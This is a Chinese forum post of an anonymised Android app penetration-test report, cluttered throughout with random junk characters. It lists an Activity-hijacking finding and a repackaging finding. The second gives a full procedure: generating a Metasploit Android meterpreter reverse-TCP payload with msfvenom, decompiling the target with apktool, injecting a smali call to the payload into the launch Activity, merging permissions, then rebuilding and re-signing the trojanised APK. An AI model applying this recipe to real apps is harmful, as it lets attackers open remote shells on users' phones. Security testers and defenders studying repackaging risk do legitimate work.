原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

; f1 T& U1 }2 j0 S G J( ^9 l: h
- H' e9 w6 Q: G3 C / o7 V2 ?- W9 e& E- I. l5 y

9 E2 r' E$ I/ e$ i l( I & r9 c: h4 q6 \* Y1 ?. Y6 R 文档编号： 4 `% f/ z4 ]" c8 j4 h1 T8 |! h) `; o

. p2 z* y* f1 Q% S " v, u/ |% t4 Q' k * G: Z4 e9 j0 X5 { 8 _4 i2 Z' h) I' m# M

0 l! q7 F, H- d! R0 a1 ?, \0 y2 ?* q' t8 G! k5 y# j* t T, a& W8 e( E2 }: q- u" k3 i* U; p0 E

/ W5 c8 g s! v! j % t) U- w5 [3 D: m/ {# @ " E7 b: {9 K! Z+ [! n8 a" a' ~# Y9 a" t

" Y. p' u( R& n- s& T# H3 v6 l- P f6 I& w # u/ |. z o1 U6 K9 n2 [* i5 H 8 {/ J7 `( n1 W1 R4 ~

4 C! s: j2 T+ B0 L: i# p) O& D) g. d7 O( ]4 S2 w/ o 5 ~' D! C; F6 i/ ?3 e; U 7 N+ ~9 h! b6 u, i8 @& }

8 p, e* u$ r$ f. {4 x) l ( y$ L" r+ w* [: f- i2 O1 e 某某某APP渗透测试 - j5 i4 Q. o, c, p# |7 {0 R: _ ; I& X; S7 T( e+ H

# ^' c1 a! Z& I* }% ^ ) e0 i% D- l: ~% g+ ~- ? % R3 o. j/ Z4 t* [& u" N7 U2 m" _2 O: V

/ W$ C) ?- [! M! N: k/ z K( U+ p% G0 E& _ + d& }: D9 e0 X ~9 F! g( t- i* B: f+ j9 }/ v& k

. k7 W! M4 |" d# Y9 f Y 4 ?6 ^/ q! K/ t" ^ , j9 ^$ s) @% [3 B1 v: i2 t# r7 b, D2 P3 w& c- E; ^' \1 O d: K

0 Z) a5 b3 U1 }& L( b . t1 k, p. j& d \4 Y/ ? 5 ^4 M" ` C7 W3 c) ? : x0 I( L9 z+ P' b' T; |5 X0 z

$ e% |, K. M h6 l& u, \, I; G : R+ Y. H* G" D" P* K$ ^ 技术报告 8 T ]0 @, z+ V9 T, P5 x" B/ C7 y+ }. ?6 R

! f. Z0 I0 ?) O P$ h8 r * C. @# C+ b) L, h7 }8 ^: Y 9 j. A+ V" t- ?. g/ M! o& ^5 g+ I- V) J* V1 B: F& m

6 V( A! e* Y. O. V" k- ~! \' S2 Q+ s4 c8 i 4 u5 C( W3 n' {: l/ _& }0 D * N: d% I) e1 @7 f: l& n

8 J# ?3 K" | R/ I ?) m- i4 K4 H 8 e4 K- \( |. J# h4 P 1 B! d5 _# {& K8 r' ^7 F ; u% c" b7 Y9 x0 I1 x# Z9 d* i

5 w1 y1 H0 ~1 L0 X) }, h) u5 g 3 p% C3 W! m M5 c, t" r 4 I% P( w7 L- T( F! Z- j, A; r ( q6 M8 C; @- X' z3 J

/ u& R% W1 B2 o4 ~; g! n 2 t8 M' L1 s6 l$ D6 ?! q$ E. B / p; N9 I U; ~* t. B 8 ^; Z" s* \+ I6 C4 y5 `! K

q8 ]6 k+ N) a+ n L/ `) p W5 A& [6 j; l- L 6 a/ G' ^) G' p- }7 w 9 b7 @$ V. I( E3 m9 ~$ @# m5 ]

( [) w0 _8 w0 n0 s: R 4 {& ^! x% N# D: @- U8 k ) `6 I8 g, E8 a- E 5 F* f t9 f, Q$ ]3 ~

7 R6 W# J v, U# Q# Q 1 T8 `, H# ^. D" c3 M4 z( B " @! O; I) |: l; K, @$ } ! _- K m# N, U4 p9 S

2 v7 V6 B2 Q, j% L* J7 _& u4 C3 t# p) O& Z9 x R0 r I- Z0 L( [; ]6 B |5 X8 h8 T+ H6 V& Y' c R# i2 P& B& c

+ B, |' a. v& Q4 [ ! Z5 J: B5 M; ~1 u0 y" U & S5 w1 K* x% \8 m# v$ J) n( V6 X " n1 [/ ]9 P. p9 K7 x; M& p/ _) O( w0 @

5 l$ ?6 l, M4 i. p3 U2 p : w1 d" c" k% a" g# L n+ m4 W$ K$ q4 q6 j* n; X9 u% X+ y $ h7 e! h# i( t* z/ r

4 D* x% K: ~: P5 k7 t # ]3 \9 j' @4 M 7 ?# p( C3 m) b0 G6 y+ g5 K * y; q1 T$ s" \" N, D

$ I* `5 f( Y( d ) S' }, K, b* J ! J: @! u6 o8 E2 L+ O 8 G1 O `% a; N* C% ^

- a! ^# `5 v: f / ?$ X. c8 R* H) g 9 z$ P+ \: G9 J2 \( h4 u3 C+ V5 g& d6 v

- U/ ^0 ?1 a3 ` `8 S! i, D- R* [' l) k ?! J , l% F8 p4 O2 g7 X! I/ l# \* F; g1 C# [! p& g) ?9 u

1 z! c% Y+ m4 w+ _8 R; T1 P3 H7 v " T4 F& P$ s% K; i3 Z6 |9 c " z" L( e, M6 |( T% ^5 h, i4 p) F- Z 5 b. c' B$ }0 q0 M) U0 W

' M2 B* S* g) W% O. [% O; Z4 p ! ^( _- Q0 C8 | 0 ?/ R8 m" P9 j+ e6 J 6 s3 l; [# g5 Z4 a- [3 c% O* E

$ n6 `, j) ? @7 n Q4 U " K6 G8 _9 Y6 \( I % L3 o; y2 f0 i" H) o3 h- R 3 [0 V+ q) ]0 l O6 i' e! {0 Y5 M

, Q' @4 h# z8 Z3 L# q ; W) O, a3 p4 ~6 S: J3 o 二〇二〇年 & Q% r0 `9 h/ E6 I2 {, y" g 4 l H6 n7 N: [0 ^. D$ R/ Y; C

% }1 h, Q2 \( o# ^' K 5 T1 c) \4 E0 f2 n3 { 目录 3 G3 K: A3 B2 n: q% b0 Q) t x. ]: Q) r7 Z* M2 [2 B' N' b

. B0 ?+ K J4 A8 _) V& F " F) y/ o w0 e8 {7 ^' B U: {2 c2 j3 G+ s' |& v4 m/ D. w2 _3 ]" n/ U

8 t" _/ t) P* n! K' e( n 8 _, D+ T# q' j2 R5 C" ~ 1 概述... 3 ' {" b8 x. z4 V; |6 o( h% k3 x0 N ( m/ Y+ A( y2 d

9 ]8 |& J! L% c3 t: t6 W 4 ~3 Q: h8 H: ]$ X 1.2测试时间... 3 $ H3 S+ y. n6 ^+ R* W ! X3 U, E" x, g; P

' T6 _- E% ^8 ~$ } 5 _! ~8 `, A' G+ Y% O 1.3测试对象... 3 v7 G! A% V) i: ~ 0 l: V6 [: C5 }9 ?) j, G3 Y

* I6 a$ Y2 b. t* R# I2 E 7 C! f1 p5 e4 |. v7 N 1.4测试结果... 3 6 M. J( F S4 j, ` / f- c9 {8 `8 ]$ @# g# G

' ^% }$ H9 M' T$ h5 u 0 b5 o; x- a, } { 2 检测结果... 4 4 G. z- f; ?3 P& W: |3 @5 f1 s$ Y) a g2 g; n

4 y6 I1 L, e% o) R0 d& K' ]4 q6 `$ g% g! c' U' |, s5 g1 X+ _ 2.1 某某某... 4 4 j& \9 l; w+ ~" J/ g$ S ) @; o @6 M: E' [6 y" \

6 I# D8 ^0 @( N* G# a P , T% D& b% h# l; D7 `& h3 A 2.1.1检测目标... 4 + c, s% z$ n C# C1 K& g " N3 _0 e9 `6 p [8 A' s; [9 a6 ]3 Y/ q

$ G: V r' `$ T; h) q4 ` # I/ `8 Z, x, g2 [0 m3 l 2.1.2检测结果... 4 . }" y6 M! W9 Z7 ^ _: E4 }. c1 R& W

1 ]8 m7 ]1 \. l- J " p3 g' i& l, V* C6 _: [1 g) k# m. w$ L 2.1.2.1. 4 / k) ` y$ s% }7 b8 j: A# O% Z$ @( O, |1 a" L1 b \

# U/ p \8 d; k! u6 g4 ~ ) l# _# [9 h" v$ I0 G% h. H 2.1.2.2. 6 & z2 W9 O" E0 \8 E9 m4 d 6 D0 b7 ?& l: b) {. Q( |/ a

/ V* y2 J/ X7 j, Q E! y4 {6 p3 |. j0 P6 a1 g! |. r+ `1 f- Y 5 g# v; L1 A5 U' v Q . F5 }1 R; M. j/ e

0 x1 I5 h0 a! ]5 R/ Q% `; u/ j% Q- v8 U5 v6 x/ J 1 概述 / }" Y9 D9 P( D+ M" G * g# s% t3 E) M& s4 S

, a! M, P: n. v$ R 1 A* l6 ?) K# c% G) L 1.2测试时间 & J) d7 A' a5 H$ ]* g9 A7 o. V" L$ b" C$ _0 z. g

% y5 ]- a8 l% i$ v) k" V4 z " s( W) ~6 R& L- W* l! V . h% x1 M: G; v / ~6 R" x* S3 Q1 v, x 渗透测试时间 4 ]& F7 P# b- D ' Z2 T3 n0 P& F# e 7 j; l2 Q$ o! ]* U# w- O 3 t$ z- m5 Y/ I) b# r* G# N8 I K
% P! A3 O7 A8 w* ^. W& Y4 x# J1 _; g( n2 o# D. O' q5 D, E , Z8 E% Y# E7 E L7 s4 a# @% t9 K. ]+ n$ ]+ {. O2 d3 [2 ~ 起始时间 & }4 h8 ]/ {! ~5 g + q3 N/ x# q* ^8 {& N( B4 a " {, l: q: B( W: s 7 I" e4 G" I4 X) \	6 G; y2 x4 P2 y& O) G K6 G/ \|, j% H+ E& P : [4 y) k* s9 a4 y0 z. E r% u8 V - l+ P. x( r% B. z n 2020年4月6日 ; Y% I$ x: v, w ^ j6 ? + F6 k( I: K4 \# j : ]. @! _! j7 P6 t; A 2 a# K3 A" g# A3 j* C
& o: y! G4 E5 [7 W8 @' ^" L ) e# ?1 S: z* g- f; x T $ W/ ]" p5 t4 Z8 D. k. f + w& W7 y( c5 ^+ K6 X 结束时间 ; f9 M6 ^' [4 z; b2 R) h8 U }; l; @ v F% s/ o8 \( Q . i p' e! _8 g; u - K/ k! M/ U; Y J: D. n	u$ R3 N- @# d* r( \, `) X$ W+ F. o! L% s9 @+ R # u2 q5 o% U* N$ r' X& L- u. o# C1 b+ ~$ Q) q" x7 [- z7 i$ ] 2020年4月9日 7 u3 u# q+ ]+ @9 A3 m( Z# f ( i$ A( Z% \|( f; G: }4 J# { 7 f5 p0 U v2 A p L9 p O4 k, W! M8 L8 t* T

; g6 x# @2 `6 a7 i+ P5 x& l! { 3 P& Z& ^! e$ d6 i7 u6 V 1.3测试对象 9 k$ }3 p: X( G, j9 X3 ?: i b0 d0 q8 T

4 Q1 ~, D' }- v: l4 S! C+ `+ ]9 E5 [ q" L% Q 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： " `: f9 Z+ w2 n+ z+ Q' r- Q : S" z& G) b! g* {% M

2 Y! D) ?5 U3 ~9 D" d T/ @ ( u& Z7 O! i# { 表1-1 检测对象 , \( Y! V) n$ F8 ^7 |8 W 4 ?5 y* Z' k+ b U9 e

8 h/ N& N: w V& \ P0 S s& v7 R( k* g8 ]# j & u2 G, ]5 {1 y% \0 Y' ]' K# C; h$ x( C! y 序号 ) m( l+ B% X5 l! c) O. p3 O0 f4 b3 d, p 8 S/ t9 w9 s j ' `, O: h+ i R- b# u( V6 J	( { T* P. \|( _. x9 k' u$ [; o" ] 7 c8 g6 D$ z6 A9 e/ W) q3 \ 5 n( j* K5 S1 `( e- g% H6 p 3 u d4 N- e: ] 测试对象 2 H! l2 w6 T2 f( R5 \8 e8 l D* W* ~9 R( ] [9 r $ Q; s& h, x8 g8 o y* N( T8 H c( G8 Y* X" l! {1 y; t	$ q+ X7 e' V& ^, j. d- `6 r1 j* O/ b/ s" J# w c4 h: u" l & L9 x: k; F3 h% N: t7 ] P+ [3 g1 x/ Z) h 测试地址 1 E! r; V" E9 p* a7 T* z& v' u/ Y " F4 W2 ]0 }* J' F. ]) `/ A* c, {" @5 a! ^0 ]9 {	7 B4 U8 B1 K5 h. i" m7 ~. P0 D; R6 h- i' C+ I3 u x ) p: A5 Q; O" E4 [) D$ n/ u" i& _ ' E; o7 c" @$ J+ J0 v* \( S 安全漏洞 9 G" }; x/ N! F, V7 `9 U / N0 c8 t1 R& H7 H" m" @, ]( ] 1 X3 ?4 q v$ v% h' S9 Y, y% b* j 2 d2 L+ O8 I2 t1 }
3 A5 K! Q) X) F2 N: Q& ?2 g ! E/ d6 v* c* o: e . \|8 I" f9 I7 Y' x' v/ y : b, T& I( n# d' f) M 1 : U) k: `( Q- B , L+ C" A4 g1 M+ l( ? 4 A. E) k* F( d- k; L3 w+ P a - S$ X3 D3 F9 H) @	) c! K+ Q2 a/ z" ]+ w! n" } ; ^7 x( \|$ O& i" i! \ " s# r5 b+ a1 E3 N+ k+ W1 ?' b& \|% t( Z/ t% } 某某某安卓APP : `& Q4 O: i$ M 1 y# O+ P! o, L7 d4 l6 W - ?' ^4 ]3 I& W& t( t - K _& q1 R G" f	7 ^0 c. `* @ [$ N0 B- y6 ^9 @- p * Z% e e3 T0 W0 O) ]5 K ( {0 m6 w5 G" d7 z; E9 X1 G) [6 \ % ]0 Q1 I. o$ O+ o8 q 1 f2 t0 x# G$ Q1 _7 H 9 t& p& }+ R# H% o 9 D6 W5 N9 _* u; v# x* a4 A! Y	, e5 d; W1 J: o% R# X* ~ v, }1 Y: Z / O4 a8 ~+ D! v9 R3 u O/ D; L% q 9 x8 M" D) Z+ H 2 % l: \|2 I# G- h+ m! F6 E: [. M; { ) u+ K; a6 _$ I g) r) C + m& a/ s. O J4 [( W+ U+ F; l 5 T) [* @6 j/ k. y, t, T7 P/ i5 u

) e5 j5 ]7 ?' X . H/ t+ C. [' z( K) r 1.4测试结果 ' O6 q& e [7 p& f * f C- T4 ^1 ]. U

( }! M2 \ f- p7 A( M3 Y, r) c$ _) j6 Q- j 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： / h; x! ~5 q" ]7 H! X7 q3 z " U8 E# k: |# z) m8 I

! G! p- q0 f/ z1 r% h3 { / w1 n0 N! |" P+ | . m$ {" _' y$ ~# g # x7 f" E! M7 [: ^. a0 C

0 C2 x# G! v% t. k/ d) t' a 9 R. u3 _6 o) v& @' w8 r 序号 % c) G) @ T8 C4 L+ w( `$ l" N 4 [- w* N5 ~5 K, H6 d9 \

7 ?+ n# U9 V+ ]! D # Z! w+ q i m9 ~ 系统名称 $ q) z1 h3 I# J1 c0 V, g & w+ H" ?4 V; G

0 [% h$ O' F. B) ?) ]$ y4 i/ t $ R6 r9 ]7 d2 _! R1 j6 c0 A5 g7 m% r 漏洞名称 8 K; Y8 N6 t& M 4 x5 k7 ~, F, i1 ~, M8 n: K

9 P# N0 U3 W3 A( \$ N. R" p) z( C% o, H7 w: U, a 漏洞危害 0 D7 m6 h1 N+ W' I d 4 }+ b1 h, ^ ]$ Y8 ^! }0 b& r

/ u& j: B8 _9 e0 u/ J* l% E ' l; x7 e$ A) }8 e$ g0 x 修复结果 ( E( m% G& w) a& M) x+ { / v3 P! e" [1 y/ f

+ Q6 ]$ f: |+ Z! q, h; W- { u8 |3 Z2 C$ l 1 s7 ~& H! f5 T' k# a+ w+ s( T3 B - r5 |$ e6 ~; k# Q

3 }; u, e' B1 r- L; u- l7 l * v+ L: @, P- L" ~" j 某某某某某某APP $ V( e) P, l7 r6 ^( F5 ^ 9 F+ W/ \' G8 Y! f1 g

3 h9 J) x/ z# f* p1 _6 V- { + N. J& U+ c" n0 w6 N. T6 X Activity 劫持 3 X' U) k+ o# @/ h) a! G+ T5 p6 z5 D7 O' a9 {4 G

: T4 X2 c2 P0 Y) w) `6 j3 n1 b ' Y3 a6 w" @9 e ; ^5 ~8 T4 M# R4 H$ _/ w0 d8 \% n7 s+ Y/ A' D% |

2 g, y" X0 n* n6 n , |0 z) O; p* h% q 高 ( z/ H$ b( G& ^; @& a( m- C . q L. {2 E* o: f1 Y% G- v9 C5 C

3 a9 v6 x& l2 U5 p* B 4 w. N5 h# d/ p! R7 T 8 ?) z3 L: {6 Q+ \; l 9 [0 a) e( P/ [' y; z

: h4 r- G. B1 ^* }, r# u 3 c8 [) n# X1 ^/ X 2 4 b) C# m: |3 d, \9 {: Z ) J2 ?2 ^ H6 C% u' `2 e

6 }3 R- P0 x4 ?/ j# p, l ( {& ]+ F! J7 U/ |% V" c2 d 某某某某某某APP 9 c7 q- v, x P3 A( {3 H9 N * w- v5 ~. \1 v! [. P4 |

7 \ i# X3 m. G8 a" h* i7 e0 l . p. |1 M% e5 G/ Y! ?# R' z 反编译二次打包捆绑木马、篡改APP代码 % m1 }4 L' B1 _1 _$ e4 }) E* Z% m4 o3 p. p7 T9 `1 [

$ g: J* r9 Q- \0 \% f6 {6 S4 u9 K, c" q1 a- L. }# H! e( o 高 1 M n$ x$ O# P# Q3 a 1 q" w6 Y/ J! ?$ w

1 i8 _! l! h9 Y* q$ B v2 ?$ V 7 e* |# h) G: h& r, U 2 x- r6 A: T% w ( e1 r- O- K7 ~' C2 w

# Y0 {, T' c+ B" B: i/ Y! M/ T1 y4 C' u- A . N* p" A* D$ J: r- T7 i # i! R% F/ G8 ~+ `! D1 X- G; A

: j" W8 x+ j. u* O* R - j# [: C5 I' O5 `6 } 表1-2 测试结果 8 ^; I) j& A9 N _ G9 X- f. ~ E3 c

# [9 ] I2 x2 O! q3 E 2 I5 U9 k3 L- g+ k0 m6 | u4 O - {9 c$ V+ l+ k8 F 7 r ^ Q. M6 E c. ^9 k. n: }

) R0 U U5 b/ @ H9 z! W 9 ^$ A7 u6 u" _, u" z 2 检测结果 $ u4 j3 d @+ K + X6 I% x; L: ~! t2 w

0 D Y3 d- H' K7 O. n8 z% k# B, N+ W) N7 A4 L! A+ B" q4 ? 2.1 某某某 , c% Z' [% G- ~" K* h. a8 J7 `- d3 \! L+ x5 M

) P+ |, z1 _7 S 0 K6 O/ r9 d% J# e k 2.1.1检测目标 - N( q; p" p8 f0 D* e( k( N+ b5 [; D2 t3 C3 A

( g+ n4 }7 M0 ~9 t+ H4 h- p: h* m6 m( K# k# K9 t 目标地址： 某某某某某某APP 6 ^2 b6 d8 s1 \: K) @ 5 _# b! L- ]& a. W3 W: g( r+ @

- Y, x2 w, f2 |+ m+ J5 K8 [7 m ( K! g! F9 C: u4 E$ z$ \3 { 2.1.2检测结果 1 i }5 o+ j; F ( k9 f# z: z7 ]/ Y E" \

1 K& o# {4 ~1 I ( |- ~/ {, a* p1 U% J 2.1.2.1 * k" G) z: Y" D- J 4 x# k: n, S3 t4 E c+ L1 P

1 v7 |7 v. @6 w& P% i * ?1 K3 r# ~4 _8 F. S3 K5 T# o3 b 漏洞链接地址：某某某某某某APP : z; s9 g5 g8 _4 I 1 X; m5 w+ E% R: I% Z% l

( N n# F$ z K$ E- ] ) M8 b) v* h2 P' L% `) L , X% w( j u4 q) G y, M2 T2 s # F$ M7 D; H+ B3 u, x

% k6 x0 P2 k4 K/ X4 I ' n; O- E! r$ o1 j- C5 I 漏洞分析及取证： ) ~1 P* {3 t6 h . G, u p* @' P1 i

0 G: w, S8 G. \6 z t* L* i* `! u) R& |2 R 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： 2 J. L( g8 b1 S 2 X- C5 e5 w( y6 T) G2 ?

. c Q: V/ S$ t7 _" R1 e$ n' O4 y : j* |& i) k! j3 D9 w) d t: M, e q 1 w" ?+ P/ s8 Z1 e( W! l) o$ n + }# @& j" C/ Z3 J3 o! d

/ `' ?% M0 H" z' T7 j8 K + x) G4 S9 ?! F R$ K9 u # }6 B- J% c) T9 K - {. @3 W6 w9 R+ Z2 N% ]# Z) J

- B# H3 ^2 |/ \" H: Y 8 j0 c5 P1 f) X* O7 R% O 1 z5 M9 i2 Z, i0 _4 V# o& b 3 }3 w1 A+ T! C6 D' a0 i0 j

- l6 m. k: Z6 S: t4 |$ z 9 }$ D! d* Y$ g3 o: p- ? * c+ O9 d$ X: L% T1 I & Q* I% I" z ^! a) t( J3 C# `

% M7 s; `$ i; v/ T8 z' l7 r# D$ n$ t3 ?- G8 {2 D! C' M 8 P: C" y2 U. _0 k 3 H1 K3 M1 H' |- ~. K" e4 E" a6 `

* B5 o) a( K# D& ^( N 6 m+ e, L) \9 I 漏洞危害：高 : T/ V- ` k! m: z* S! X4 q. j9 n; ?7 {2 C7 j ~, ?. U

$ h3 l- r1 P& ~9 E& m ) a5 }- @% s! Q- \ . v% P. d4 b7 \9 z # w. ` Q) x& x* j; m8 T 严重程度 ) W( i6 l/ o. z/ \|; y# F' @2 T 0 g0 f; c W/ i' t 6 K6 N: a5 x7 p: Z2 v . X# \3 Z/ N/ d3 T. X: B# y	: Z0 \|. H( `4 _( A6 @; I & {; ~8 b2 w% y9 w/ C ! S% o1 }3 z' N: q& W- P* D0 E4 }' V, V$ _( t5 s- x# D0 f/ Q9 l 高 3 b3 R& \% @) a( q+ e' w # L( a8 O( H: X8 \|4 L , \' l! ^9 Y; E8 t3 M& Z K2 D , b B. V) D1 C( }- }	, T1 {6 A, [( Z- M" V' o, F + L: m: @6 ?) Y p# B5 ]7 T + {0 ]3 p. N) K$ Q/ [6 n- G5 A4 ^. p- d ■ a/ v& V3 \6 w / ~ A. @7 t% u4 e& C ' Q" _8 O2 x( W+ o4 P3 J: M, x3 Q8 J1 a; z2 i! N2 ~	7 k" M% t( t. F# j0 w6 v& D+ \# t2 { 2 s! o1 ]7 \# j( h8 m/ z* i! G+ _4 @; o- c: l3 }, T 中 $ h# p* a* ~. b7 F9 m 3 N% @9 A- ]) o' N 2 m% N" k8 N: G% p4 z. Q( w ( @/ @& T' W( ?* P7 c* a	( @! O, H, o: `4 c / q/ f" N- l$ ^ 6 Z2 v9 u$ Q H8 d3 ~! j! D$ d ) { O$ g- P* [& \ 6 [; k/ Z, B! W* ~; {9 a; e& y9 K3 X- u* J( D 4 j% r/ k0 {8 t+ C" v% Q( q 1 K$ {) t- O5 G$ s" b1 j4 K* B	# [' D5 k0 @! X! x4 m' g 8 X" `" h; ^. T5 X 4 \|) g2 h# @' B# w& a. I, [8 H6 H 6 Y. s( r- D$ s4 F+ i) o 低 ) G c4 h8 d- D2 h" D7 W8 t8 Y4 k1 o1 B7 p7 i8 K' b. P: l $ z- u) ^8 R% e+ F: R+ p 6 `% ?" g c! D2 j8 t# _/ V	1 u7 l- ~4 p: R. z- d' A& J2 J" N) V ) K) R: s8 ~" y. s9 k5 Q1 ]& h8 F& D 1 t. I9 w, _" x; C" _ 3 D' _# \/ y3 l# ?; E ; H) J$ E P2 {" I 6 L$ w R. ^: P( _

3 B. \0 S' |6 y+ o " c1 Q& ?% J* a2 R5 K/ B9 m $ U% e. h0 e1 M) G4 m/ q0 k* a3 j- T, O. ~8 `% s7 S

' J: P. P* {) I : C* q) g) v9 [% A+ B0 I 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 : @8 S7 _1 x& ^* O4 s: V, h: K/ }9 b. p) a/ E( c$ G

5 x; V' ?- Z9 Z0 B0 y ; p8 L1 F: b, ^3 f. ]: n; m4 ` 4 [; p( ]1 Y' O* L2 V# M0 X, U5 T* U0 l9 G F. f

8 u) q' T: r+ K% x7 }' |- z ' O+ s3 r5 v) b( \! [+ z2 O & Y0 Q4 E* B4 }. \ 3 E, x/ o$ _, g0 _# Q

- m% }$ T. L2 F f7 e2 [( t : d7 z% y) h8 a9 d1 X& H, d 2.1.2.2 % R9 L7 j& l7 \# e# W " I4 d6 n3 D7 D$ q3 ^

' l) ~3 y; D; \+ e3 Q& \: { b3 K# F) X/ a( K% ?( ?1 E/ Y 漏洞链接地址：某某某某某某APP I) ~1 p1 Q8 n; Y; A , Z4 y( O1 J4 T1 Y S: t# `

! B9 a! M# v/ B i" `6 ~ 2 c. O6 `/ V5 } 漏洞分析及取证： ) |3 _. E) ~* U , h6 B# V. o% E; k

6 _6 J1 L4 K( Z; t* d# S% Z 8 n( {) A% k l* m* u% Z: { 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： , B8 Q! F8 ~' K7 A P 0 {- h8 [, q/ Y/ A

5 W; U) w U3 M) j1 y0 t: X" L 7 J8 ~$ t' H0 n: \+ J, O& ~* K 用Metasploit 生成木马 apk 9 s$ N4 j- m6 {0 a6 f 2 w8 M6 f" [( g: ?' B

4 V: X- C- p) H/ k2 X : |' A a2 G' _8 Q) O( u msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 6 ]) z' H' v8 e' [/ J, T' z: ?. f ; e( u! Y2 U `$ p; c

4 \# |. g+ V/ ^% a 9 b- e( _+ y6 w 反编译目标apk和木马apk - x/ W; E( h# f/ o: M0 B' W' w" y3 E) c6 X1 s7 T

$ p& r! t- l! f1 s. N; O. ^- q + _$ I+ B" q y apktool d target.apk
3 J, g6 t% ]1 G) H, ~4 s 4 f7 [7 h, v. B' m3 B apktool d cockhorse.apk & _0 w( O% Q/ G) c2 r g( i - ]- I% d$ d' }( w' s

3 T) r0 M6 I- s4 L$ O m& W# d. G$ Z; _/ b! N8 ]. H6 Q, L* l0 L 木马 apk 注入目标 apk . Q' g: {4 g P0 e6 C/ H * A6 t6 S& M7 B C- h4 A" ?/ s+ {$ v

! E7 ~: |7 @5 o2 \3 H4 o* n6 D # Y: }4 B/ [6 R 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
Z" V9 w, U8 W0 _ : A3 }$ \: b2 S% E3 h invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V % E4 l* Y% O7 J# r, v, i+ c3 h4 w. w9 G' g- g. r1 K

' P" y2 H* `0 Z: m k& H, S. o4 t2 g' @4 K 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 & h" ~7 E2 v `6 w4 Z0 w# M5 ?: E5 y7 }0 W$ i5 X

6 M+ C: e5 O- T! K7 r - k0 w; O; V- I0 |% y 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 ( @/ U' f- K L7 o8 \) a+ \" U! R( I2 K" c: O

5 Z4 B% x$ i5 T9 z* k 3 {) a. E. r$ `) C 回编译生成最终 apk ( Z( ^. Z/ N2 [/ Y2 D& [% \/ p) u7 g3 l) `2 l# L- G3 i

# S' u4 U, C& h8 y7 r! D9 h( ~6 l6 U- _! G9 X 重新打包 1 H5 O) g( R( Y* m L# ?# u- b1 R# J" M# E3 u

! y. ^* U( y3 M' n2 H8 M* }. s z# j) N7 ^& \ apktool b -o repackage.apk target_app_floder 2 g: T o: Q. Q& x% {) E, V7 L+ b9 W3 i9 L

* \% T4 D& \* N; h# p9 W' `7 z 创建签名文件，有的话可忽略此步骤 4 P1 _$ d$ b2 A2 T5 k4 X * ~, k* c& ]& G+ G P5 @

( N% N) L; h: S. y2 U ' R1 j8 E9 `% ?5 B keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 & V% y% b y7 C7 Y # `7 I) B% N" G9 Z

( l' r' m7 @) b0 k, v/ x5 B: l ' \ i9 ?% @* A 签名，以下任选其一 7 P/ R/ W3 J- ~9 W% y# J: N0 d$ H% ? n7 V

0 ^! i, u) }1 G v5 P3 ?! K " d& q* z y) v% @: V% I) W+ a jarsigner 方式 ) i' ^2 X( ]2 Q) A" N $ n7 `% v1 b! r0 L q

& |$ o( L/ m2 g' q, T r4 Q: @* Q/ a: C( H jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname : v. _: L3 Z8 E- N5 ^1 k; o8 E1 f5 j& ]+ R0 p1 O

6 }; a, c7 I. U3 b3 J8 v7 X5 p% X' M! V8 y6 U% w4 N( z apksigner 方式 # n. \7 ]" ]. a: i1 X. x5 ?2 ~! d4 E6 z# a

0 r8 V7 b6 ]9 L* t6 {1 ^1 m : r8 q! _1 t# h apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 8 ~4 e5 |6 E4 L( T% r7 T# }- g. y 2 g `7 u+ |8 d3 B

% Q2 T% \+ S% Q B' N% w 1 ^& I9 a: x8 k# p 如需要禁用 v2签名 添加选项--v2-signing-enabled false 1 g3 B0 T5 [' T4 J1 x1 \ # U7 C! T9 s7 x- z

`2 }$ q3 J% n) Z 4 P5 ?$ @4 k9 S3 {0 H$ m 验证，以下任选其一 $ B0 f+ ?4 m, q- Y; a, @# P) l" q) X; M- \# H+ ?* {

E; w, N# C% R! c; `8 a" p/ y. y- u( @% C jarsigner方式 + ~- y! h; e1 `) [, Q / u7 W8 L; c4 L3 P/ B/ y% y

/ L1 b- k( k4 `3 E : g% g" ^4 N$ }+ I. } jarsigner -verify repackaged.apk - ^8 ]) p7 n9 B- Y 1 q z8 u }/ q4 ~" A; w1 X [

9 \( y% j! r, O- b2 k ) ~1 k7 K" B* F4 n5 V8 b apksigner 方式 5 J' O2 b" `7 _9 E8 T t9 a( m# F7 E8 c4 C/ p

1 O, v& w" k' M% E 5 L8 i2 g" Y" [/ J2 G3 [ apksigner verify -v --print-certs repackaged.apk $ t+ V3 @3 T( Q$ Q9 n8 w0 F ) j& p. q$ w1 H

6 V6 Z0 u6 L: @2 l i) P: Z3 ` / M1 s) g' a" V& l& f3 T( c keytool方式 0 F5 b0 N6 z* e+ G4 i9 \ , Z& {; |% e3 s9 d$ z! B1 z

U9 r8 Z0 t3 K( M$ m) _3 J/ J' e; ]4 N- b9 V( c q keytool -printcert -jarfile repackaged.apk 6 T/ @; h4 n2 z6 Z1 B & y. ~, v! u* t( S* ~7 W, X

0 [7 `- T! [, C : ~# f; O: u/ r; O/ r1 W 对齐 . \" n8 ^4 \! _7 z5 ~0 A* w5 W+ l1 Z" u5 Z

) |1 o6 q3 X+ H7 N " X( X0 l# o( C! \4 ^% r 字节对齐优化 ( o8 f! J" d: C; _ q ) F3 ^) r* H8 c! n

